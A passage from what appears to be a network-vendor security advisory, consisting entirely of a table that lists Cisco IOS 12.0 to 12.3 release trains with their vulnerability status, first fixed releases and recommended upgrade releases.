|------------+-------------+-------------|
| 12.0WT     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.0XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.0(4)XI2  |             |
|            | are         |             |
|            | vulnerable, |             |
| 12.0XI     | release     | 12.4(15)    |
|            | 12.0(4)XI2  | T812.4(23)  |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|            | first fixed |             |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XK     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XL     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XM     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XN     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XQ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XS     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XT     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XV     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.1-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1AA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AX     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AY     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1CX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1DA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1DB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1DC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1E      | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1EA     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
| 12.1EB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(33)    |
| 12.1EC     | first fixed | SCA212.2    |
|            | in 12.3BC   | (33)SCB12.3 |
|            |             | (23)BC6     |
|------------+-------------+-------------|
| 12.1EO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.1EU     | first fixed | SGA912.2    |
|            | in 12.2SG   | (50)SG      |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.1EV     | first fixed | S1212.2(33) |
|            | in 12.4     | SB312.4(15) |
|            |             | T812.4(23)  |
|------------+-------------+-------------|
|            |             | 12.2(31)    |
|            | Vulnerable; | SGA912.2    |
| 12.1EW     | first fixed | (50)SG12.4  |
|            | in 12.4     | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1EX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1EY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1EZ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1GA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1GB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1T      | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XF     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XI     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XL     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XM     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XP     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XQ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XS     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XT     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XU     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XV     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XW     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XY     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XZ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.1(5)YE6  |             |
|            | are         |             |
|            | vulnerable, |             |
| 12.1YE     | release     | 12.4(15)    |
|            | 12.1(5)YE6  | T812.4(23)  |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|            | first fixed |             |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YF     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1YI     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1YJ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.2-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2B      | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2BC     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2BW     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(33)    |
| 12.2BX     | first fixed | SB312.4(15) |
|            | in 12.4     | T812.4(23)  |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2BY     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2BZ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2CX     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2CY     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.2CZ     | first fixed | S1212.2(33) |
|            | in 12.2SB   | SB3         |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2DA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2DD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2DX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.2EW     | first fixed | SGA912.2    |
|            | in 12.2SG   | (50)SG      |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.2EWA    | first fixed | SGA912.2    |
|            | in 12.2SG   | (50)SG      |
|------------+-------------+-------------|
| 12.2EX     | 12.2(40)EX  | 12.2(44)EX1 |
|------------+-------------+-------------|
|            | 12.2(44)EY; | 12.2(46)EY; |
| 12.2EY     | Available   | Available   |
|            | on          | on          |
|            | 30-JAN-2009 | 23-JAN-2009 |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2EZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2FX     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(44)    |
| 12.2FY     | first fixed | EX112.2(44) |
|            | in 12.2EX   | SE4         |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2FZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
| 12.2IRA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2IRB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2IXA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXF    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXG    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2JA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2JK     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2MB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2MC     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2S      | first fixed | 12.2(20)S12 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | 12.2(33)    |             |
|            | SB12.2(31)  |             |
| 12.2SB     | SB14;       | 12.2(33)SB3 |
|            | Available   |             |
|            | on          |             |
|            | 16-JAN-2009 |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SBC    | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
| 12.2SCA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SCB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SE     | 12.2(40)SE  | 12.2(44)SE4 |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEA    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEB    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEC    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SED    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEE    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEF    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(44)    |
| 12.2SEG    | first fixed | EX112.2(44) |
|            | in 12.2EX   | SE4         |
|------------+-------------+-------------|
| 12.2SG     | 12.2(44)SG  | 12.2(50)SG  |
|------------+-------------+-------------|
| 12.2SGA    | 12.2(31)    | 12.2(31)    |
|            | SGA9        | SGA9        |
|------------+-------------+-------------|
| 12.2SL     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SM     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SQ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SR     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SRA    | migrate to  | 12.2(33)    |
|            | any release | SRC3        |
|            | in 12.2SRC  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SRB    | migrate to  | 12.2(33)    |
|            | any release | SRC3        |
|            | in 12.2SRC  |             |
|------------+-------------+-------------|
| 12.2SRC    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SRD    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2STE    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2SU     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.2SV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SVE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SW     | first fixed | 12.4(15)T8  |
|            | in 12.4SW   |             |
|------------+-------------+-------------|
| 12.2SX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXF    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2SXH    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SXI    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.2SY     | first fixed | S1212.2(33) |
|            | in 12.2SB   | SB3         |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.2SZ     | first fixed | S1212.2(33) |
|            | in 12.2SB   | SB3         |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2T      | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2TPC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2XF     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XI     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XK     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XL     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XM     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(20)    |
|            |             | S1212.2(33) |
|            |             | SB312.2(33) |
| 12.2XN     | 12.2(33)XN1 | SRC312.2    |
|            |             | (33)        |
|            |             | XNA212.2    |
|            |             | (33r)SRD2   |
|------------+-------------+-------------|
| 12.2XNA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2XNB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | 12.2(46)XO; | 12.2(46)XO; |
| 12.2XO     | Available   | Available   |
|            | on          | on          |
|            | 02-FEB-2009 | 02-FEB-2009 |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XQ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XS     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XT     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XU     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XV     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2XW     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2YA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2YB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YC     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YD     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YE     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YF     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YG     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YH     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YJ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YK     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2YM     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.2YN     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2YP     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2YQ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YR     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YS     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2YT     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YU     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YW     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YZ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.2(13)ZC  |             |
|            | are         |             |
| 12.2ZC     | vulnerable, |             |
|            | release     |             |
|            | 12.2(13)ZC  |             |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|------------+-------------+-------------|
| 12.2ZD     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2ZE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2ZF     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2ZG     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2ZH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2ZJ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZP     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2ZU     | migrate to  |             |
|            | any release |             |
|            | in 12.2SXH  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2ZX     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
| 12.2ZY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZYA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.3-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3B      | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3BC     | 12.3(23)BC6 | 12.3(23)BC6 |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3BW     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3EU     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.3JA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3JK     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3JL     | Vulnerable; |             |
|            | contact TAC |             |
